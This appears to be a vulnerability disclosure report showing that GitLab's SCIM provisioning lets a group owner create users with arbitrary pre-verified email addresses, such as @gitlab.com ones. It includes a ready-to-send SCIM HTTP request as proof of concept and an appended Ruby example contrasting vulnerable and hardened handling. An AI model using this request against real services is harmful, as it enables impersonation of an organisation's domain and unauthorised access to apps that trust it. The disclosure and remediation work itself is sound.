Hi, I found that the new SCIM provisioning function allows any group owner in GitLab to create any user with a verified email address, i.e. I can create a user with the email address [email protected], and gitlab.com will consider [email protected] already verified.
This will cause problems for client apps that use GitLab as an Identity Provider and check whether the user's email domain matches @gitlab.com; using this email verification bypass, we can access the service.
I used to have a list of internal services/sites of GitLab that use gitlab.com to sign in and check whether the signed-in user has @gitlab.com as their email domain, but I can't find them any more. I am sure the GitLab security team knows what those services are, and exposure of those services would have a high security impact on GitLab's infrastructure.
https://gitlab.com/groups/GROUP_PATH/-/saml
and set up SAML SSO as documented. Then send the following SCIM request:

POST /api/scim/v2/groups/YOUR_GROUP_NAME/Users HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/scim+json
Authorization: Bearer YOUR_SCIM_TOKEN
Content-Length: 291

{"externalId":"REPLACE_ME","active":null,"userName":"anyusernamewilldo","emails":[{"primary":true,"type":"work","value":"[email protected]"}],"name":{"formatted":"Test User","familyName":"User","givenName":"Test3"},"schemas":["urn:ietf:params:scim:schemas:core:2.0:User"],"meta":{"resourceType":"User"}}
Check the user username4 on gitlab.com; you will see that their email address is [email protected] and verified.
Email is verified without going through the verification process
Email should not be verified using this method
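To make the expected behaviour concrete, here is an added example (not GitLab's code, and not part of the report) contrasting the behaviour described above with a hardened SCIM provisioning handler: the provisioned email counts as verified only when the group has proven ownership of that email's domain, and the relying-party check on the client-app side trusts domain membership only for verified addresses. The group path, the verified-domain table, the domain names and the SCIM payload are all constructed for the example.

```ruby
require 'json'

# Constructed sample: domains a group has proven ownership of (hypothetical
# data; no assumption is made about how GitLab models domain verification).
VERIFIED_DOMAINS = {
  'example-corp-group' => ['example-corp.com']
}.freeze

User = Struct.new(:username, :email, :email_verified, :confirmation_required,
                  keyword_init: true)

def email_domain(email)
  email.to_s.split('@', 2)[1]&.downcase
end

def primary_email(payload)
  emails = Array(payload['emails'])
  primary = emails.find { |e| e['primary'] } || emails.first
  primary && primary['value']
end

# Behaviour the report describes: a SCIM-created user gets a verified email
# immediately, whatever address the group owner supplied.
def provision_scim_user_vulnerable(_group_path, scim_payload)
  User.new(username: scim_payload['userName'],
           email: primary_email(scim_payload),
           email_verified: true,
           confirmation_required: false)
end

# Hardened behaviour: the address is verified only if its domain belongs to
# the provisioning group; otherwise the account is created with an unverified
# email and the normal confirmation flow has to complete first.
def provision_scim_user_hardened(group_path, scim_payload)
  email = primary_email(scim_payload)
  domain = email_domain(email)
  raise ArgumentError, 'SCIM user has no primary email' unless domain

  trusted = VERIFIED_DOMAINS.fetch(group_path, []).include?(domain)
  User.new(username: scim_payload['userName'],
           email: email,
           email_verified: trusted,
           confirmation_required: !trusted)
end

# Relying-party check from the report: a client app that gates access on the
# email domain must only honour the domain when the IdP verified the address.
def allow_internal_access?(user, internal_domain)
  user.email_verified && email_domain(user.email) == internal_domain
end

# Constructed SCIM payload in the shape of the report's request body, with a
# placeholder address at the relying party's domain.
SAMPLE_PAYLOAD = JSON.parse(<<~JSON)
  {"externalId":"REPLACE_ME","active":null,"userName":"anyusernamewilldo",
   "emails":[{"primary":true,"type":"work","value":"attacker-chosen@internal.example"}],
   "schemas":["urn:ietf:params:scim:schemas:core:2.0:User"]}
JSON

if __FILE__ == $PROGRAM_NAME
  weak = provision_scim_user_vulnerable('example-corp-group', SAMPLE_PAYLOAD)
  hard = provision_scim_user_hardened('example-corp-group', SAMPLE_PAYLOAD)
  puts "vulnerable: verified=#{weak.email_verified} " \
       "access=#{allow_internal_access?(weak, 'internal.example')}"
  puts "hardened:   verified=#{hard.email_verified} " \
       "access=#{allow_internal_access?(hard, 'internal.example')}"
end
```

Running the file shows the vulnerable path granting access to the relying party for an address the group never proved it owns, while the hardened path leaves the email unverified, so the same domain check denies access until confirmation completes. A user whose email domain is in the group's verified list is still provisioned with a verified address, so legitimate SCIM provisioning keeps working.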
{F484033}
This bug happens on GitLab.com
see above